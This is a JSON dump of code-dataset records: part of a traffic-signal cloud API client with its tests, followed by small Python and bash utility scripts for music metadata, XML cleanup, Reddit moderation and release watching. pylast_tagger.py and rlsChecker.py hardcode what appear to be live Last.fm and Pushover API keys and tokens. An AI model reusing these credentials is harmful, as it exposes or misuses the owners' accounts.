json=json_dict, headers=headers)\n logging.debug(f\"finished calling endpoint {endpoint}\")\n except requests.exceptions.ConnectionError:\n raise UnknownCloudException(CONNECTION_ERROR_MSG)\n\n # check for errors\n check_status_code(response=r)\n\n # parse output\n output = r.json()\n objective_value = output[\"obj_value\"]\n fixed_time_schedule = FixedTimeSchedule.from_json(output[\"fixed_time_schedule\"])\n # check if safety restrictions are satisfied; raises a SafetyViolation-exception if this is not the case.\n validate_safety_restrictions(intersection=intersection, fixed_time_schedule=fixed_time_schedule)\n\n return fixed_time_schedule, objective_value\n\n @classmethod\n @ensure_has_internet\n @authenticate\n def evaluate_fts(cls, intersection: Intersection, arrival_rates: ArrivalRates,\n fixed_time_schedule: FixedTimeSchedule, horizon: float = 2.0,\n initial_queue_lengths: Optional[QueueLengths] = None) -> KPIs:\n \"\"\"\n Evaluate a fixed-time schedule; returns KPIs (estimated delay experienced by road users and the capacity (\n see also KPIs and the SwiftMobilityCloudApi.get_optimized_fts() method for their definition.\n :param intersection: intersection for which to optimize the fts (contains signal groups, conflicts and more)\n :param arrival_rates: arrival rates; each arrival rate is specified in personal car equivalent per hour (PCE/h)\n cyclists per hour or pedestrians per hour\n :param fixed_time_schedule:\n :param initial_queue_lengths: initial amount of traffic waiting at each of the traffic lights; if None, then we\n assume no initial traffic.\n :param horizon: time period of interest in hours.\n :return KPIs, which are the estimated\n \"\"\"\n assert horizon >= 1, HORIZON_LB_EXCEEDED_MSG\n if initial_queue_lengths is None:\n # assume no initial traffic\n initial_queue_lengths = QueueLengths({signalgroup.id: [0] * len(signalgroup.traffic_lights)\n for signalgroup in intersection.signalgroups})\n\n check_all_arrival_rates_and_queue_lengths_specified(intersection=intersection, arrival_rates=arrival_rates,\n initial_queue_lengths=initial_queue_lengths)\n\n endpoint = f\"{CLOUD_API_URL}/fts-evaluation\"\n headers = SwiftMobilityCloudApi.get_authentication_header()\n\n # rest-api call\n try:\n # assume that the traffic that is initially present arrives during the horizon.\n corrected_arrival_rates = arrival_rates + initial_queue_lengths / horizon\n json_dict = dict(\n intersection=intersection.to_json(),\n arrival_rates=corrected_arrival_rates.to_json(),\n fixed_time_schedule=fixed_time_schedule.to_json()\n )\n logging.debug(f\"calling endpoint {endpoint}\")\n r = requests.post(endpoint, json=json_dict, headers=headers)\n logging.debug(f\"finished calling endpoint {endpoint}\")\n except requests.exceptions.ConnectionError:\n raise UnknownCloudException(CONNECTION_ERROR_MSG)\n\n # check for errors\n check_status_code(response=r)\n\n return KPIs.from_json(r.json())\n\n @classmethod\n @ensure_has_internet\n @authenticate\n def get_phase_diagram(cls, intersection: Intersection, fixed_time_schedule: FixedTimeSchedule) -> PhaseDiagram:\n \"\"\"\n Get the phase diagram specifying the order in which the signal groups have their greenyellow intervals\n in the fixed-time schedule\n :param intersection: intersection for which to optimize the fts (contains signal groups, conflicts and more)\n :param fixed_time_schedule: fixed-time schedule for which we want to retrieve the phase diagram.\n :return: the associated phase diagram\n\n IMPORTANT: we try to start the greenyellow intervals of two signal groups that are subject to a synchronous\n start or a greenyellow-lead in the same phase; however, if this is not possible for all such pairs, then we try to\n satisfy it for as many such pairs as possible.\n\n For example consider the following theoretical problem where we have three signal groups:\n sg1, sg2, and sg3. sg1 conflicts with sg2 and sg3. sg2 has a greenyellow_lead(min=30, max=50) w.r.t. sg3.\n The following schedule is feasible\n greenyellow_intervals = {\"sg1\": [[0, 10], [40, 50]], \"sg2\": [[20, 30]], \"sg3\": [[60,70]]}\n period=80\n\n However, it is not possible to find a phase diagram where sg2 and sg3 start in the same phase; only the\n following phase diagram is possible: [[[\"sg1\", 0]], [[\"sg2\", 0]], [[\"sg1\", 1]], [[\"sg3\", 0]]]\n \"\"\"\n endpoint = f\"{CLOUD_API_URL}/phase-diagram-computation\"\n headers = SwiftMobilityCloudApi.get_authentication_header()\n\n # rest-api call\n try:\n json_dict = dict(\n intersection=intersection.to_json(),\n greenyellow_intervals=fixed_time_schedule.to_json()[\"greenyellow_intervals\"],\n period=fixed_time_schedule.to_json()[\"period\"]\n )\n logging.debug(f\"calling endpoint {endpoint}\")\n r = requests.post(endpoint, json=json_dict, headers=headers)\n logging.debug(f\"finished calling endpoint {endpoint}\")\n except requests.exceptions.ConnectionError:\n raise UnknownCloudException(CONNECTION_ERROR_MSG)\n\n # check for errors\n check_status_code(response=r)\n output = r.json()\n\n # parse output\n phase_diagram = PhaseDiagram.from_json(output[\"phase_diagram\"])\n return phase_diagram\n\n\ndef check_all_arrival_rates_and_queue_lengths_specified(intersection: Intersection, arrival_rates: ArrivalRates,\n initial_queue_lengths: QueueLengths):\n \"\"\"\n :param intersection: intersection for which to optimize the fts (contains signal groups, conflicts and more)\n :param arrival_rates: arrival rates in personal car equivalent per hour (PCE/h)\n :param initial_queue_lengths: initial amount of traffic waiting at each of the traffic lights; if None, then we\n assume no initial traffic.\n :raises AssertionError if an arrival rate or queue length is not specified for some traffic light(s).\n \"\"\"\n for signalgroup in intersection.signalgroups:\n assert signalgroup.id in arrival_rates.id_to_arrival_rates, \\\n f\"arrival rate(s) must be specified for signal group {signalgroup.id}\"\n assert len(arrival_rates.id_to_arrival_rates[signalgroup.id]) == len(signalgroup.traffic_lights), \\\n f\"arrival rate(s) must be specified for all traffic lights of signal group {signalgroup.id}\"\n\n assert signalgroup.id in initial_queue_lengths.id_to_queue_lengths, \\\n f\"initial_queue_lengths(s) must be specified for signal group {signalgroup.id}\"\n assert len(initial_queue_lengths.id_to_queue_lengths[signalgroup.id]) == len(signalgroup.traffic_lights), \\\n f\"initial_queue_lengths(s) must be specified for all traffic lights of signalgroup {signalgroup.id}\"\n"
},
{
"alpha_fraction": 0.6070489287376404,
"alphanum_fraction": 0.6267753839492798,
"avg_line_length": 33.880733489990234,
"blob_id": "f57bd7137ba72c4e93eef19bdd3f6612b3d81f04",
"content_id": "3dabf611f13a996ebd763e53f7007b52c11c5047",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3802,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 109,
"path": "/swift_cloud_py/entities/scenario/test/test_queue_lengths.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\nfrom swift_cloud_py.entities.scenario.queue_lengths import QueueLengths\n\n\nclass TestInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for QueueLengths() \"\"\"\n return dict(id_to_queue_lengths={\"1\": [1000, 950], \"2\": [850, 700]})\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing QueueLengths object with correct input \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n QueueLengths(**input_dict)\n\n # THEN no error should be raised\n\n def test_no_dict(self) -> None:\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_queue_lengths\"] = 1\n\n with self.assertRaises(ValueError):\n # WHEN initializing the queue lengths\n QueueLengths(**input_dict)\n\n # THEN an error should be raised\n\n def test_no_string_values(self) -> None:\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_queue_lengths\"][1] = [1, 2] # add value (1) which is not a string\n\n with self.assertRaises(ValueError):\n # WHEN initializing the queue lengths\n QueueLengths(**input_dict)\n\n # THEN an error should be raised\n\n def test_no_list_for_rates(self) -> None:\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_queue_lengths\"][\"3\"] = 1 # rates is not a list\n\n with self.assertRaises(ValueError):\n # WHEN initializing the queue lengths\n QueueLengths(**input_dict)\n\n # THEN an error should be raised\n\n def test_queue_lengths_no_number(self) -> None:\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_queue_lengths\"][\"3\"] = [1, \"3\"] # rates is not a list of numbers\n\n with self.assertRaises(ValueError):\n # WHEN initializing the queue lengths\n QueueLengths(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestOperations(unittest.TestCase):\n\n def test_divide(self) -> None:\n \"\"\" Test dividing QueueLengths by a float (a time)\"\"\"\n # GIVEN\n queue_lengths = QueueLengths(id_to_queue_lengths={\"1\": [1000, 950], \"2\": [850, 700]})\n\n # WHEN\n rates = queue_lengths / 2\n\n # THEN\n self.assertIsInstance(rates, ArrivalRates)\n self.assertListEqual(rates.id_to_arrival_rates[\"1\"], [1000 / 2, 950 / 2])\n self.assertListEqual(rates.id_to_arrival_rates[\"2\"], [850 / 2, 700 / 2])\n\n def test_dividing_no_float(self) -> None:\n \"\"\" Test dividing by incorrect datatype \"\"\"\n # GIVEN\n queue_lengths = QueueLengths(id_to_queue_lengths={\"1\": [1000, 950], \"2\": [850, 700]})\n\n with self.assertRaises(ArithmeticError):\n # WHEN adding to rates with different ids\n queue_lengths / \"str\"\n\n # THEN an assertion should be raised\n\n\nclass TestJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n queue_lengths = QueueLengths(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n queue_lengths_dict = queue_lengths.to_json()\n queue_lengths_from_json = QueueLengths.from_json(queue_lengths_dict=queue_lengths_dict)\n self.assertDictEqual(queue_lengths_dict, queue_lengths_from_json.to_json())\n"
},
{
"alpha_fraction": 0.5995623469352722,
"alphanum_fraction": 0.5995623469352722,
"avg_line_length": 25.114286422729492,
"blob_id": "25581edc31be85776cd603401156387620ef945c",
"content_id": "9e22860bf61643c8ec45ec41501f4b8ae9ebf9a8",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 914,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 35,
"path": "/swift_cloud_py/entities/intersection/periodic_order.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations\n\nfrom copy import deepcopy\nfrom typing import List, Dict\n\n\nclass PeriodicOrder:\n def __init__(self, order: List[str]):\n \"\"\" Order in which to serve signal groups\"\"\"\n self._order = order\n\n # validate values of arguments\n self._validate()\n\n def __repr__(self) -> str:\n return f\"FixedOrder({self._order})\"\n\n @property\n def order(self) -> List[str]:\n return self._order\n\n def __iter__(self):\n return iter(self._order)\n\n @classmethod\n def from_json(cls, order_dict: Dict) -> PeriodicOrder:\n return cls(order=order_dict[\"order\"])\n\n def to_json(self) -> Dict:\n return {\"order\": deepcopy(self._order)}\n\n def _validate(self):\n \"\"\" Validate input arguments of Confict \"\"\"\n if len(set(self._order)) != len(self._order):\n raise ValueError(\"Items in 'order' should be unique\")\n"
}
] | 44 |
visti/Sandrew
|
https://github.com/visti/Sandrew
|
6459fc2935529223e4b5db897e62e9b00889f3b4
|
c2d25fdd414ad2aa416e70fa48ef60ef94b50922
|
aeb286def7614781ab1ee6b5175a5dc38216dec0
|
refs/heads/master
| 2020-12-25T15:29:05.847952 | 2018-08-23T09:47:58 | 2018-08-23T09:47:58 | 38,604,891 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.637982189655304,
"alphanum_fraction": 0.6577646136283875,
"avg_line_length": 19.0625,
"blob_id": "096550d65538c010d9dc6a7cb1557e64be3bcab1",
"content_id": "dcef089c106abe284fe97ec4dc9daaeb680696ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2022,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 96,
"path": "/pylast_tagger/pylast_tagger.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "import pylast\r\nimport tkinter\r\nimport re\r\nimport tkinter.filedialog\r\nimport tkinter.simpledialog\r\nimport random\r\nfrom retrying import retry\r\n\r\nglobal artist\r\nglobal title\r\nglobal itunes_main\r\nglobal itunes_sub\r\n\r\n# GUI Drawing + Focus settings\r\n\r\nroot = tkinter.Tk()\r\nroot.withdraw()\r\nroot.lift()\r\nroot.focus_force()\r\n\r\n# Categorize genres\r\nwith open('main_genres.txt', 'r') as f:\r\n\tmain_genres = [lines.strip() for lines in f]\r\n\r\nwith open('sub_genres.txt', 'r') as f:\r\n\tsub_genres = [lines.strip() for lines in f]\r\n\r\n\r\n\r\n# read track list \r\nfile_path = tkinter.filedialog.askopenfilename()\r\n\r\nlines = open(file_path, 'r').readlines()\r\n\r\ndef split_track(song):\r\n\t\tstripped = [song.strip() for line in song]\r\n\t\tparts = stripped[0].split('|')\r\n\t\tglobal artist\r\n\t\tartist = parts[0]\r\n\t\tglobal title\r\n\t\ttitle = parts[1]\r\n\r\n\t\r\n\r\ndef search_lastfm(artist, title):\r\n\ttry :\r\n\t\ttrack = network.get_track(artist, title)\r\n\t\ttags = track.get_top_tags()\r\n\r\n\t\tgenre = []\r\n\r\n\t\tfor topItem in tags:\r\n\t\t\tgenre.append(topItem.item.get_name())\r\n\r\n\t\tglobal itunes_main\r\n\t\tglobal itunes_sub\r\n\t\titunes_main = set([x.title() for x in genre]).intersection(main_genres)\r\n\t\titunes_sub_raw = set([x.title() for x in genre]).intersection(sub_genres)\r\n\t\titunes_sub = []\r\n\t\tfor x in itunes_sub_raw:\r\n\t\t\tif x not in itunes_main:\r\n\t\t\t\titunes_sub.append(x)\r\n\t\tfinal = str(track) +\"|\"+\" \".join(itunes_main) +\"|\"+\" \".join(itunes_sub) + \"\\n\"\r\n\t\tprint(final)\r\n\t\twritefile(final)\r\n\t\r\n\texcept pylast.WSError:\r\n\t\tprint(artist + \" - \" + title + \"\\n\")\r\n\r\n\r\n\r\n\r\ndef writefile(final):\r\n\twith open(\"output.txt\", 'a') as f:\r\n\t\tf.write(final)\r\n\r\n# API Authentication\r\n\r\nAPI_KEY = \"8611a1f82dd20dc8ca8af7e5bc303ca9\"\r\nAPI_SECRET = \"a2aa6b3434e4c96a05e1433bad60486f\"\r\nusername = \"visti\"\r\npassword_hash = pylast.md5(\"hunter2\")\r\nnetwork = pylast.LastFMNetwork(api_key = API_KEY, api_secret =\r\n API_SECRET, username = username, password_hash = password_hash)\r\n\r\n\r\n\r\n# Main Loop\r\n\r\n\r\nfor song in lines:\r\n\tsplit_track(song)\r\n\tsearch_lastfm(artist, title)\r\n\r\n\r\n#\r\n"
},
{
"alpha_fraction": 0.6726535558700562,
"alphanum_fraction": 0.6906141638755798,
"avg_line_length": 24,
"blob_id": "1474797c63224b321a7fc23f1439edd7893137e7",
"content_id": "5cebe7928ace6af4f0ee85fa851a6e738c60b904",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1726,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 69,
"path": "/xml_shortener.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "#-*- coding: UTF-8 -*-\n# A script to find XML fields exceeding an 80 character limit and shorten them.\n# Uses a tkinter file selection dialog\n\n\nimport xml.etree.cElementTree as ET\nimport itertools\nimport tkinter\nimport tkinter.filedialog\nimport tkinter.simpledialog\nfrom tkinter.simpledialog import Dialog\nfrom tkinter.simpledialog import Toplevel\nfrom tkinter.simpledialog import Label\nimport winsound\nimport os\n\nusername = os.getlogin()\n\n# GUI Drawing + Focus settings\ntkroot = tkinter.Tk()\ntkroot.withdraw()\ntkroot.lift()\ntkroot.focus_force()\n\n\n# choose original file\noriginal_file = tkinter.filedialog.askopenfilename(\n title=\"Choose File:\", initialdir=os.curdir)\n\noutput_file = original_file[:-4] + '_fixed.xml'\n\n# create tree from XML file\ntree = ET.parse(original_file)\nroot = tree.getroot()\n\n# iterate through the 3 elements:\nfield_list = [\"MAIN-ARTIST-NAME-COLLECTING-SOCIETY\",\n \"RECORDING-TITLE-COLLECTING-SOCIETY\",\n \"LABEL\"]\n\ndef working_message(username):\n os.system('cls')\n print(\"\\n\" * 10)\n print(\"-\" * 120)\n print(\"\\n\")\n print(\"XML Shortening Script\".center(120))\n print(\"Working..\".center(120))\n print(\"\\n\")\n print(\"running for user: \\n\".center(120))\n print(username.center(120))\n print(\"-\" * 120)\n print(\"\\n\")\n \nworking_message(username)\n\nfor i in field_list:\n for element in root.iter(i):\n if len(element.text) > 80:\n element.text = element.text[:80]\n\ntree = ET.ElementTree(root)\n\n\n# write corrected file to disk\ntree.write(open(output_file, 'wb'), encoding=\"utf-8\", xml_declaration=True)\n\n# Completion message\nwinsound.MessageBeep(1)\ntkinter.messagebox.showinfo(\"Done!\", \"Created file: \\n\" + output_file + \".\")\n\n"
},
{
"alpha_fraction": 0.6589556932449341,
"alphanum_fraction": 0.6678783893585205,
"avg_line_length": 33.77011489868164,
"blob_id": "f420ccf261b8d2153d51931c3aeec0ad3f98c404",
"content_id": "f6e33102e469a3ab50fc32b753a55f13e3210700",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3028,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 87,
"path": "/reddit_OP_comment_checker.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "import praw\nimport datetime\nimport time\n\ndef main():\n\n\t# Authenticate Reddit bot. Needs API client_id and client_secret\n\treddit = praw.Reddit(client_id='',\n\t\t\t\t\t\tclient_secret='',\n\t\t\t\t\t\tpassword='',\n\t\t\t\t\t\tusername='guitar_remover_bot',\n\t\t\t\t\t\tuser_agent='my user agent')\n\n\t \n\t# Active Subreddit for the bot\n\ttarget_subreddit = reddit.subreddit('7330313')\n\n\t# username for the bot – Used to make sure there's no duplicate warning messages\n\tbot_username = 'guitar_remover_bot'\n\t\t\t\t\t\t\n\t# Getting current time and stripping it of seconds and microseconds\n\tcurrent_time=datetime.datetime.now()\n\tcurrent_time=current_time.replace(second=0,microsecond=0)\n\n\t# Main loop, runs every minute\n\twhile True:\n\t\tfor submission in target_subreddit.new(limit=100):\n\t\t\tsubmission_checker(submission, bot_username)\n\t\ttime.sleep(60)\n\n\n# The base function that checks every submission\ndef submission_checker(submission, bot_username):\n\t\t# Create list of all usernames to comment on a submission\n\t\tcomment_authors=[]\n\t\tprint(\"THREAD TITLE: \" + \"\\\"\" + submission.title + \"\\\"\")\n\t\t\n\t\t# Check thread age and convert to minutes\n\t\tthread_age = datetime.datetime.now(datetime.timezone.utc).timestamp()-submission.created_utc\n\t\tthread_age = thread_age/60\n\t\tprint(str(thread_age).split(\".\")[0] + \" mins old.\")\n\t\t\n\t\t# Add all current commenters to the list\n\t\tfor top_level_comment in submission.comments:\n\t\t\t\tcomment_authors.append(top_level_comment.author.name)\n\t\t\n\t\t# Print out submission OP and active commenters\n\t\tprint( \"OP = \" + str(submission.author))\n\t\tprint(\"Commenters: \" + str(comment_authors) + \"\\n\")\n\t\t\n\t\t# Print out message if OP has already replied\n\t\tif submission.author in comment_authors:\n\t\t\tprint(\"## OP Commented. ##\\n\\n\")\n\t\t\n\t\t# If the thread is older than 30 minutes:\n\t\tif thread_age > 30:\n\t\t\t# and OP has not replied:\n\t\t\tif submission.author not in comment_authors:\n\t\t\t\t# print messages to console and remove thread\n\t\t\t\tprint(\"## Thread overdue. ##\\n## OP has not commented. ## \\n\")\n\t\t\t\tsubmission.mod.remove()\n\t\t\t\tprint(\"## Thread removed. ##\")\n\t\t\t\tprint(\"----------------------------------------------------------\\n\")\n\t\t\n\t\t# if thread is older than 10 minutes:\n\t\tif thread_age > 10:\n\t\t\t# and OP HAS replied:\n\t\t\tif submission.author in comment_authors:\n\t\t\t\tfor top_level_comment in submission.comments:\n\t\t\t\t\t# remove flair and delete warning message\n\t\t\t\t\tif top_level_comment.author == bot_username:\n\t\t\t\t\t\tsubmission.mod.flair(\"\")\n\t\t\t\t\t\ttop_level_comment.delete()\n\t\t\t\t\t\tprint(\"## Removed warning message. ##\")\n\n\t\t\t# if OP has NOT replied:\t\t\t\n\t\t\tif submission.author not in comment_authors:\n\t\t\t\t# set flair\n\t\t\t\tsubmission.mod.flair('Missing OP comment')\n\t\t\t\t # post warning message\n\t\t\t\tif bot_username not in comment_authors:\n\t\t\t\t\tsubmission.reply(\"Friendly reminder that all submisssions must feature a comment from the author.\\nThis submission will be removed in 20 minutes if not descriptive comment is made.\")\n\t\t\t\tprint(\"----------------------------------------------------------\\n\")\n\n# main loop\nif __name__ == '__main__':\n\tmain()\n\n"
},
{
"alpha_fraction": 0.6162070631980896,
"alphanum_fraction": 0.6207090616226196,
"avg_line_length": 21.78205108642578,
"blob_id": "128369998cd2551e74207de388563d6d059c2d1b",
"content_id": "04e661cb4bb84ab17e871e930f9cf04392b99be7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1777,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 78,
"path": "/clean_titles_test.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport tkinter\nimport tkinter.filedialog\nimport tkinter.simpledialog\nimport re\nimport time\nimport datetime\nimport os\n\n# Pattern to search for\n\nmessy_title_pat = re.compile(r', (The|A|An)$')\n\n# Backup old log-file\n\nif os.path.isfile('logfile2.txt'):\n os.remove('logfile2.txt')\nif os.path.isfile('logfile.txt'):\n os.rename('logfile.txt', 'logfile2.txt')\n\n# Options\n\nnoncorrectlog = 0\n\n# GUI Drawing + Focus settings\n\nroot = tkinter.Tk()\nroot.withdraw()\nroot.lift()\nroot.focus_force()\n\n# Choose Input/Output Files\n\nfile_path = tkinter.filedialog.askopenfilename()\nclean_path = tkinter.simpledialog.askstring('Gem renset fil',\n 'Indtast filnavn', initialvalue=file_path[:-4] + 'Clean.txt')\nlines = open(file_path, 'r').readlines()\n\n\ndef logfile(song_title):\n with open('logfile.txt', 'a') as f:\n ts = time.time()\n logtime = \\\n datetime.datetime.fromtimestamp(ts).strftime('%H:%M:%S')\n f.write(logtime + ' - ' + song_title)\n\n\ndef add_lines(song_title):\n with open(clean_path, 'a') as f:\n f.write(song_title)\n\n\ndef clean_title(song_title):\n match = messy_title_pat.search(song_title)\n if match:\n print('RETTET: ' + '\"' + song_title.strip() + '\"')\n logfile(song_title)\n return match.group(1) + ' ' + song_title[:match.start()] + '\\n'\n else:\n\n # If noncorrect-log is on, also output non-corrected filenames to log file\n\n if noncorrectlog == 1:\n print('IKKE RETTET: ' + '\"' + song_title.strip() + '\"')\n logfile('IKKE RETTET: ' + song_title)\n return song_title\n else:\n return song_title\n\n\n### MAIN LOOP ###\n\nfor song_title in lines:\n add_lines(clean_title(song_title))\n\n### MAIN LOOP ###\n"
},
{
"alpha_fraction": 0.5892373323440552,
"alphanum_fraction": 0.6182733178138733,
"avg_line_length": 26.478723526000977,
"blob_id": "d50c07496537f27e3d6fe898da37eb68dc1d4461",
"content_id": "b9fd861d2d492a81789cc547731cdef647345a3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2587,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 94,
"path": "/filelocator",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# FILE COPIER SCRIPT / FILELOCATOR\n# usage: filelocator [location number file] [destination] [optional location number length, default 4]\n#\n# ex: ./filelocator classic-locations.txt /cygdrive/c/test2/ 5\n#\n\n#IFS='\n#'\noIFS=$IFS\nIFS=$'\\n'\nstty cols 100\n\n#location number length – Default 4\nloc_length=${3:-4}\n\n#\"clear screen\nprintf \"\\033c\"\n\necho \"\"\necho -e \"\\e[41m\"\necho -e \"\\e[1mFILE COPIER - Sandrew Metronome \\e[7m#########\"\necho -e \"#########################################\"\necho \"\"\necho \"Location number file: $1\"\necho \"Number of lines:\" $(wc -l < $1)\necho \"\"\necho \"File destination: $2\"\necho -e \"\\e[0m\"\nsleep 3\n\n# Count lines in file \ntotal_lines=$(wc -l < $1)\ncount=1\n\nprint_percent() {\n str=$1\n num=$2\n v=$(printf \"%-${num}s\" \"$str\")\n echo -e \"\\e[104m\"\"${v// /#}\"\"\\e[0m\"\\\\r\n}\n\nfull_percent() {\n str=$1\n num=$2\n v=$(printf \"%-${num}s\" \"$str\")\n echo -ne \"\\e[41m\"\"${v// /#}\"\"\\e[0m\"\\\\r\n}\n\n\nwhile read line; #read each line from the file in the first argument\ndo\n name=$line;\n destination=$2 #second argument is file destination\n folder=${line:0:$loc_length} #folder name is first four digits of location number \n track=${line: -2} #track identifier is last two digits of location number\n folderlocation=\"$(locate -r '/'$folder'$' )\" #search database for folder name, returns full path\n filelocation=\"$(find \"$folderlocation\" -type f -name \"$track*wav\" 2>/dev/null)\" #find specific track inside folder location using track number.\n \n # Create folders in destination – All error messages suppressed \n mkdir $destination/\"$folder\"/ 2>> /dev/null\n mkdir $destination/\"$folder\"/album 2>> /dev/null\n mkdir $destination/log 2>/dev/null\n \n # Give feedback on process \n tput civis\n tput sc\n echo -e \"\\e[1mCopying Folder: \\e[33m$folder\\e[0m, \\e[1mTrack: \\e[91m$track \\e[21m\\e[39m\\e[0m\"\n \n #print current line out of total lines\n echo -e \"\\e[93m\"Current: $count \"/\" $total_lines\n echo -e \"Lines left: \" $(($total_lines-$count))\n echo -e \"\\e[0m\"\n percent=$(printf '%i %i' $count $total_lines | awk '{ pc=100*$1/$2; i=int(pc); print (pc-i<0.5)?i:i+1 }')\n echo $percent\"%\"\n print_percent \"#\" $percent\n full_percent \"#\" 100\n tput rc\n \n (( count++ ))\n \n # Copy file found earlier to specified destination\n cp -ri \"$filelocation\" /cygdrive/c/test2/\"$folder\"/album/ 2>>$destination/log/\"$folder\"-\"$track\".txt\n \n # Delete all log-files that are 0 bytes (non-errors)\n find $destination/log/ -name '*' -size 0 -print0 | xargs -0 rm 2>/dev/null\n \ndone < $1\ntput cnorm\n\necho \"\"\necho \"DONE!\"\necho \"\"\n"
},
{
"alpha_fraction": 0.6005509495735168,
"alphanum_fraction": 0.6184573173522949,
"avg_line_length": 22.576271057128906,
"blob_id": "ed0d8cabd92e7de3904c97a07fcd73bf16d2c3b7",
"content_id": "ea05688346498e2c9ca1c0c7a95f18508232673f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1452,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 59,
"path": "/rlsChecker.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "import time\r\nimport winsound\r\nimport tkinter.simpledialog as tksd\r\nimport feedparser\r\nimport re\r\nimport os\r\nfrom pushover import Client\r\n\r\n\r\nclient = Client(\"u4a9fk7gyxgz8yb8xngvj9fyuuj673\", api_token=\"a42t226ott7n15yi3brhvoop8bzjad\")\r\n\r\nstartTime = time.clock()\r\n\r\nfeed = feedparser.parse('http://predb.me/?cats=games-pc&rss=1')\r\n\r\nfound_list = []\r\n\r\ndef game_found(result):\r\n if result in found_list:\r\n print(\"Already found: \" + result)\r\n return\r\n else:\r\n print(result + \" exists on predb.me\")\r\n client.send_message(result + \" exists on PreDB.me\", title=\"Game release\")\r\n winsound.Beep(200, 1000)\r\n found_list.append(result)\r\n\r\n\r\ndef main_loop(release):\r\n count = 0\r\n while count < 20:\r\n result = feed['entries'][count].title.split(\"/n\")\r\n count = count + 1\r\n\r\n for game in result:\r\n if re.search(release, game, re.IGNORECASE):\r\n game_found(game)\r\n\r\n\r\ndef getUptime():\r\n timeSeconds = time.clock() - startTime\r\n timeMinutes = timeSeconds / 60\r\n humanTime = str(round(timeMinutes, 0))\r\n print(\"Time Elapsed: \" + humanTime + \" Minutes\")\r\n return\r\n\r\n# GUI Drawing + Focus settings\r\nroot = tksd.Tk()\r\nroot.withdraw()\r\nroot.lift()\r\nroot.focus_force()\r\n\r\nrelease = tksd.askstring(\"Release\", \"search for release:\")\r\nwhile True:\r\n os.system(\"cls\")\r\n print(\"Searching for \" + release.upper())\r\n getUptime()\r\n main_loop(release)\r\n time.sleep(60)\r\n\r\n"
},
{
"alpha_fraction": 0.5007309913635254,
"alphanum_fraction": 0.5029239654541016,
"avg_line_length": 31.571428298950195,
"blob_id": "d7393cbf1311d4572b15773bb8e120c08f6c4a42",
"content_id": "5af3cade525284293037135040d58e59a0dfa110",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1368,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 42,
"path": "/charm.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "import tkinter\nimport tkinter.filedialog\nimport tkinter.simpledialog\nimport os\n\nprint (\"Choosing File\")\n\n# GUI Drawing + Focus settings\nroot = tkinter.Tk()\nroot.withdraw()\nroot.lift()\nroot.focus_force()\n\n# Choose Original File\noriginal_file = tkinter.filedialog.askopenfilename(title=\"Choose File:\", initialdir=os.curdir)\n\n# Open original file, read into list\nwith open(original_file) as f:\n original_lines = f.read().splitlines()\n\n# Replace bad characters \noriginal_lines = [w.replace('[', \"\") \\\n .replace(']', \" \") \\\n .replace('%', \" \") \\\n .replace('+', \" \") \\\n .replace(\"(\", \" \") \\\n .replace(\")\", \" \") \\\n .replace(\"_\", \" \") for w in original_lines]\n\n# Create output name variable \noutput_file = original_file[:-4] + '_fixed.txt'\n\n\n# Write all lines with newline except last\nwith open(output_file, 'w+', encoding='ANSI') as f:\n for line in original_lines[:-1]:\n f.write(line.strip() + \"\\n\")\n f.write(original_lines[-1].rstrip())\n\n \n# Completion message\ntkinter.messagebox.showinfo(\"Done!\", \"Created file: \\n\" + output_file)\n"
},
{
